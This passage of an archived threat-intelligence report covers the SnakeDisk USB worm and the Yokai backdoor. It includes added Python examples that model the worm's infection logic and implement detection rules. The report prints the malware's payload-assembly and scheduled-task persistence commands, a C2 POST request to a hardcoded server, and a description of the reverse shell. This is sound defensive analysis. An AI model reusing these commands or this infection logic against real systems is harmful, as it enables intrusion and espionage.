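The SnakeDisk initialization and USB-handling checks walked through in the last few sections, as an added example in Python (my own model, not SnakeDisk's code and not from the IBM report): the fail-open geofence decision, WM_DEVICECHANGE handling down to drive letters, the size and CRC32 pre-check on candidate config files, and the version comparison that gates reinfection. The CRC byte order and the dotted version format are assumptions, the DEV_BROADCAST_VOLUME bytes and config blobs are constructed test data, and the 2-phase XOR decryption is left out because the report does not specify it. It runs without Windows or network access.

```python
# Added example: a Python model of the SnakeDisk checks described above (geofence, window
# messages, config-file validation, version comparison). Illustrative code, not SnakeDisk's own.
import json
import struct
import zlib

WM_DEVICECHANGE = 0x219
DBT_DEVICEARRIVAL = 0x8000
DBT_DEVICEREMOVECOMPLETE = 0x8004
DBT_DEVTYP_VOLUME = 0x2
CONFIG_MIN_SIZE = 0x14A      # 330 bytes, the size of the key header
CONFIG_MAX_SIZE = 0x14000

def geofence_allows(ipinfo_body):
    '''ipinfo_body is the response text, or None when the lookup failed. Mirrors the fail-open
    behaviour: only a successful answer naming another country stops execution.'''
    if ipinfo_body is None:
        return True
    try:
        country = json.loads(ipinfo_body).get('country', '')
    except ValueError:
        return True
    return country in ('THA', 'TH')

def unitmask_to_drive_letters(unitmask):
    '''dbcv_unitmask: bit 0 is A:, bit 1 is B:, and so on.'''
    return [chr(ord('A') + bit) for bit in range(26) if unitmask & (1 << bit)]

def make_volume_lparam(unitmask):
    '''Constructed DEV_BROADCAST_VOLUME bytes (size, devicetype, reserved, unitmask, flags).'''
    return struct.pack('<IIIIH', 20, DBT_DEVTYP_VOLUME, 0, unitmask, 0)

def on_window_message(msg, wparam, lparam):
    '''Model of the window procedure: the actions SnakeDisk takes for a message.'''
    if msg != WM_DEVICECHANGE:
        return []
    if wparam == DBT_DEVICEREMOVECOMPLETE:
        return [('drop_payload', None)]         # same path as the -hope argument
    if wparam == DBT_DEVICEARRIVAL:
        _size, devtype, _res, unitmask, _flags = struct.unpack_from('<IIIIH', lparam)
        if devtype != DBT_DEVTYP_VOLUME:
            return []
        return [('infect_drive', d) for d in unitmask_to_drive_letters(unitmask)]
    return []

def is_config_candidate(blob):
    '''The size window and the leading CRC32 over the rest of the file. The report does not say
    how the CRC is stored, so both byte orders are tried and the matching one is returned.'''
    if not CONFIG_MIN_SIZE <= len(blob) <= CONFIG_MAX_SIZE:
        return None
    crc = zlib.crc32(blob[4:]) & 0xFFFFFFFF
    if struct.unpack('<I', blob[:4])[0] == crc:
        return 'little-endian'
    if struct.unpack('>I', blob[:4])[0] == crc:
        return 'big-endian'
    return None

def find_config_candidates(files):
    '''files: mapping filename -> bytes from a drive; on a USB only .dat and .cd files are tried.'''
    hits = {}
    for name, blob in files.items():
        if name.lower().endswith(('.dat', '.cd')):
            order = is_config_candidate(blob)
            if order:
                hits[name] = order
    return hits

def should_reinfect(drive_version, own_version):
    '''Reinfect only if the drive carries an older version (dotted-integer strings assumed).'''
    def as_tuple(v):
        return tuple(int(p) for p in v.split('.'))
    return as_tuple(drive_version) < as_tuple(own_version)

def make_config_blob(body, byteorder='<'):
    '''Constructed config-shaped file: CRC32 header followed by an opaque body.'''
    return struct.pack(byteorder + 'I', zlib.crc32(body) & 0xFFFFFFFF) + body

if __name__ == '__main__':
    print(geofence_allows(json.dumps({'country': 'SG'})), geofence_allows(None))
    print(on_window_message(WM_DEVICECHANGE, DBT_DEVICEARRIVAL, make_volume_lparam(1 << 4)))
    drive = {'01.dat': make_config_blob(bytes(400)), 'notes.txt': bytes(400), 'x.cd': bytes(400)}
    print(find_config_candidates(drive), should_reinfect('1.0', '1.1'))
```

The same size-and-CRC pre-check is a cheap way to triage a suspect USB drive during incident response: any .dat or .cd file in the size window whose first four bytes are the CRC32 of the remainder deserves a closer look before the hidden directories are restored.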
\r\nPayload execution\r\nThe SnakeDisk thread responsible for dropping and executing its embedded payload is launched when a USB\r\ndevice removal is detected, or at the beginning of SnakeDisk's execution via the \"-hope\" command line argument. \r\nFirst, the thread reads a marker file \"vm.ini\" in its directory and compares the content to its own current path. This\r\nfile is also written after successful dropping and execution of payloads and indicates if a victim has already been\r\ninfected with SnakeDisk's embedded payload. If the paths match, no payloads will be dropped and the thread\r\nterminates. \r\nAfter the first check, SnakeDisk begins to drop a series of payloads to the \"C:\\Users\\Public\\\" directory. Each file is\r\nconstructed in memory from immediate values in large functions of between 0.6 and 3.3 MB.\r\nFig. 11: Disassembled function constructing a binary payload\r\nThe payloads are then decrypted via a simple XOR operation before being dropped as files to:\r\nC:\\Users\\Public\\srv0\r\nC:\\Users\\Public\\srv1\r\nC:\\Users\\Public\\srv2\r\nC:\\Users\\Public\\loga\r\nC:\\Users\\Public\\logb\r\nC:\\Users\\Public\\logc\r\nThese files are concatenated together in groups of three to produce the two final payloads via the following\r\ncommands:\r\ncmd.exe /c cd \"c:\\users\\public\\\" \u0026 copy /b \"srv0\"+\"srv1\"+\"srv2\" c:\\users\\public\\libcef.dll\r\ncmd.exe /c cd \"c:\\users\\public\\\" \u0026 copy /b \"loga\"+\"logb\"+\"logc\" c:\\users\\public\\\u003crandomised_name\u003e.exe\r\nThe EXE's filename is created from 10 random uppercase letters and numbers. After concatenation, the files are\r\ndeleted. 
\r\nFinally, the executable is launched in a new process with a hardcoded command line argument:\r\nc:\\users\\public\\\u003crandomised_name\u003e.exe -project-mod\r\nUnsurprisingly, the EXE (bb5bb82e5caf7d4dbbe878b75b23f793a5f3c5ca6dba70d8be447e8c004d26ce) is a\r\nlegitimate and signed executable (acwebbrowser.exe) which sideloads the malicious libcef.dll during execution. \r\nYokai backdoor\r\nThe DLL payload was identified as the Yokai backdoor, reported on in December 2024 by Netskope. Upon\r\nexecution, the malware first checks for the \"-project-mod\" argument and then establishes persistence via a\r\nscheduled task if the user is not a member of the Administrators group:\r\ncmd.exe /c schtasks /create /f /sc MINUTE /MO 5 /tn \"MicrosoftEdgeAcModuleUpdateTask\" /tr \"\u003cpath\u003e -project-mod\"\r\nIt goes on to create a new mutex \"k1tpddvivh74fo1et725okr1c1\" and initializes an internal configuration\r\nstructure. The variant dropped by SnakeDisk contains the version string \"1.0.0\" and reaches out to a hardcoded C2\r\nserver via HTTP POST requests:\r\nPOST /kptinfo/import/index.php HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: WinHTTP Example/1.0\r\nAPI-INDEX: 0\r\nAccept-Connect: 0\r\nContent-Length: 156\r\nHost: 118.174.183[.]89\r\n\r\n\u003cencrypted data\u003e\r\nAs described in Netskope's analysis, Yokai is used to create a reverse shell through anonymous pipes, allowing\r\noperators to execute arbitrary commands on the infected machine. \r\nInterestingly, Yokai shows overlaps with other backdoor families attributed to Hive0154, such as Pubload/Pubshell\r\nand Toneshell. 
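The host and network artifacts of the payload stage described above, turned into detection logic as an added example in Python (my own code, not from the IBM report or Netskope): the copy /b assembly in the Public directory, the random ten-character executable, the -project-mod launch, the Yokai scheduled task, the Yokai POST with its WinHTTP Example/1.0 header set, and, from the SnakeDisk initialization section, the ipinfo.io lookup. The sample command lines and requests are my own reconstructions of the patterns quoted in the text, and the normalisation (case folding, separator and whitespace handling) is a design choice for log matching rather than anything the malware does.

```python
# Added example: detection logic for the payload-stage artifacts described above, run over
# constructed process command lines and HTTP requests. Illustrative code, not from the report.
import re

BS = chr(92)    # backslash
DQ = chr(34)    # double quote
CRLF = chr(13) + chr(10)

def win(path):
    '''Turn a forward-slash path into a Windows one for the constructed samples.'''
    return path.replace('/', BS)

def norm(cmdline):
    '''Case-fold, collapse whitespace and use forward slashes so one rule matches either separator.'''
    return ' '.join(cmdline.replace(BS, '/').lower().split())

# Each rule lists substrings that must all appear in the normalised command line.
CMDLINE_RULES = {
    'snakedisk_copy_b_assembly': ['cmd.exe /c cd', 'c:/users/public/', 'copy /b', '+'],
    'snakedisk_libcef_drop': ['copy /b', 'c:/users/public/libcef.dll'],
    'yokai_project_mod_launch': ['c:/users/public/', '.exe -project-mod'],
    'yokai_schtasks_persistence': ['schtasks', '/sc minute', '/mo 5', 'microsoftedgeacmoduleupdatetask'],
}
# Ten uppercase letters or digits directly under the Public directory; the path part is case-insensitive.
RANDOM_EXE = re.compile('(?i:/users/public/)[A-Z0-9]{10}(?i:[.]exe)')

def match_cmdline(cmdline):
    '''Return the names of all rules a process command line triggers.'''
    n = norm(cmdline)
    hits = [name for name, needles in CMDLINE_RULES.items() if all(x in n for x in needles)]
    if RANDOM_EXE.search(cmdline.replace(BS, '/')):
        hits.append('random_10char_exe_in_public')
    return hits

def parse_http_request(raw):
    '''Split a raw request into method, path and a lower-cased header dict.'''
    head = raw.split(CRLF + CRLF, 1)[0]
    lines = head.split(CRLF)
    method, path, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        key, _sep, value = line.partition(':')
        headers[key.strip().lower()] = value.strip()
    return method, path, headers

def http_rule_hits(method, path, h):
    hits = []
    if method == 'POST' and path == '/kptinfo/import/index.php':
        hits.append('yokai_c2_post')
    if h.get('user-agent') == 'WinHTTP Example/1.0' and 'api-index' in h and 'accept-connect' in h:
        hits.append('yokai_winhttp_headers')
    if method == 'GET' and path == '/json' and h.get('host') == 'ipinfo.io' and h.get('user-agent') == 'Program/1.0':
        hits.append('snakedisk_geofence_lookup')
    return hits

def match_http(raw):
    '''Return the names of all network rules a raw HTTP request triggers.'''
    return http_rule_hits(*parse_http_request(raw))

# Constructed samples modelled on the command lines and requests quoted in the text.
PUBLIC = win('c:/users/public/')
SAMPLE_CMDLINES = [
    'cmd.exe /c cd ' + DQ + PUBLIC + DQ + ' & copy /b ' + DQ + 'srv0' + DQ + '+' + DQ + 'srv1' + DQ
    + '+' + DQ + 'srv2' + DQ + ' ' + PUBLIC + 'libcef.dll',
    PUBLIC + 'AB12CD34EF.exe -project-mod',
    'cmd.exe /c schtasks /create /f /sc MINUTE /MO 5 /tn ' + DQ + 'MicrosoftEdgeAcModuleUpdateTask' + DQ
    + ' /tr ' + DQ + PUBLIC + 'AB12CD34EF.exe -project-mod' + DQ,
    'copy /b ' + win('d:/parts/a.bin') + '+' + win('d:/parts/b.bin') + ' ' + win('d:/out.bin'),   # benign
]
YOKAI_POST = CRLF.join([
    'POST /kptinfo/import/index.php HTTP/1.1', 'Connection: Keep-Alive',
    'Content-Type: application/x-www-form-urlencoded', 'User-Agent: WinHTTP Example/1.0',
    'API-INDEX: 0', 'Accept-Connect: 0', 'Content-Length: 156', 'Host: 118.174.183.89', '', '']) + 'x' * 156

if __name__ == '__main__':
    for cmd in SAMPLE_CMDLINES:
        print(match_cmdline(cmd))
    print(match_http(YOKAI_POST))
```

The command-line rules are deliberately substring based so they survive the quoting and case differences between EDR products; the scheduled task rule is the most durable of them, since the task name and the five-minute interval are fixed in the sample while the random executable name is not.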
Although those families are clearly separate pieces of malware, they roughly follow the same structure and use similar techniques to establish a reverse shell with their C2 server.\r\nOverlaps with Tonedisk\r\nX-Force analysis also revealed strong overlaps between SnakeDisk and Tonedisk. Over the years, there have been several USB worm families associated with Hive0154. Variants strongly related to the Toneshell family in their implementations are tracked by X-Force as Tonedisk. So far, 3 major Tonedisk versions (A, B and C) have been identified. Each of the Tonedisk versions is a suite of different malicious components that make up the full functionality of the USB worm. These components include launchers, loaders, spreaders, encrypted files, installers and backdoors.\r\nSnakeDisk overlaps specifically with the Tonedisk A variant, which was also reported on in mid-2023 by Check Point as WispRider. The USB propagation mechanisms, API hashing and configuration files of both malware families display several similarities, which align with Hive0154 subclusters' known tendency to share and repurpose malware among themselves.\r\nAttribution\r\nX-Force tracks the activity in this report under the Hive0154 umbrella cluster, which partially overlaps with activity published as Mustang Panda, Stately Taurus, Camaro Dragon, Twill Typhoon, Polaris, TEMP.Hex, and Earth Preta. This group appears to maintain a considerably large malware ecosystem with frequent overlaps in malicious code, techniques used during attacks, and targeting. Within the larger umbrella cluster, X-Force separates at least three subclusters of activity with low confidence, with each cluster associated with one of the central malware strains PlugX, Toneshell, and Pubload. Notably, each malware strain is paired with a different USB worm framework and one or more related loader malware variants, which change more frequently. 
The same loader may be used for different payloads, such as Toneshell or Pubload, within the same timeframe. However, it is important to note that the clustering of activity does not automatically signal that the subclusters are operating as separate subgroups.\r\nActivity associated with the use of SnakeDisk and the Yokai backdoor possibly indicates a further subcluster of Hive0154. It currently appears to be mainly targeted towards Thailand, as evident from IP geolocation checks in SnakeDisk and Netskope reporting.\r\nConclusion\r\nHive0154 remains a highly capable threat actor with multiple active subclusters and frequent development cycles. X-Force assesses with high confidence that China-aligned groups like Hive0154 will continue to refine their large malware arsenal and target public and private organizations worldwide. The malware discussed in this report is likely still in early development, allowing defenders to adopt detection mechanisms before its widespread use. Entities at risk of Hive0154 espionage should remain at a heightened state of defensive security, remain vigilant with regard to the techniques mentioned in this report and review the following recommendations:\r\nExercise caution with emails or PDFs containing Google Drive, Box Cloud Storage or Dropbox download links\r\nExercise caution with downloaded archives, even if they do contain expected documents. 
Train staff to display file extensions and recognize unexpected ones\r\nMonitor and hunt in networks for TLS 1.2 Application Data packets (header: 17 03 03) without a previous TLS handshake as a sign of a Pubload or Toneshell beacon\r\nMonitor and hunt for USB drives containing suspicious executable names, DLLs and hidden directories which could indicate a device infected with a USB worm\r\nMonitor and hunt for suspicious and unknown directories in C:\\ProgramData\\ which contain a legitimate EXE vulnerable to DLL sideloading and a corresponding DLL\r\nMonitor and hunt for persistence techniques in the registry and scheduled tasks\r\nHunt for processes, network traffic and IoCs detailed in this report\r\nMonitor any unusual network, persistence, or file modification activity coming from seemingly benign process executables that sideload a malicious DLL\r\nIndicators of compromise\r\nSource: https://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor"
	],
	"report_names": [
		"hive0154-drops-updated-toneshell-backdoor"
	],
	"threat_actors": [
		{
			"id": "93542ae8-73cb-482b-90a3-445a20663f15",
			"created_at": "2022-10-25T16:07:24.058412Z",
			"updated_at": "2026-04-10T02:00:04.853499Z",
			"deleted_at": null,
			"main_name": "PKPLUG",
			"aliases": [
				"Stately Taurus"
			],
			"source_name": "ETDA:PKPLUG",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "20b5fa2f-2ef1-4e69-8275-25927a762f72",
			"created_at": "2025-08-07T02:03:24.573647Z",
			"updated_at": "2026-04-10T02:00:03.765721Z",
			"deleted_at": null,
			"main_name": "BRONZE DUDLEY",
			"aliases": [
				"TA428 ",
				"Temp.Hex ",
				"Vicious Panda "
			],
			"source_name": "Secureworks:BRONZE DUDLEY",
			"tools": [
				"NCCTrojan",
				"PhantomNet",
				"PoisonIvy",
				"Royal Road"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479",
			"created_at": "2023-10-27T02:00:07.764261Z",
			"updated_at": "2026-04-10T02:00:03.378226Z",
			"deleted_at": null,
			"main_name": "Camaro Dragon",
			"aliases": [],
			"source_name": "MISPGALAXY:Camaro Dragon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434114,
	"ts_updated_at": 1775826690,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/37cd3681fbd8728979cff325ff205b4378d460c4.pdf",
		"text": "https://archive.orkl.eu/37cd3681fbd8728979cff325ff205b4378d460c4.txt",
		"img": "https://archive.orkl.eu/37cd3681fbd8728979cff325ff205b4378d460c4.jpg"
	}
}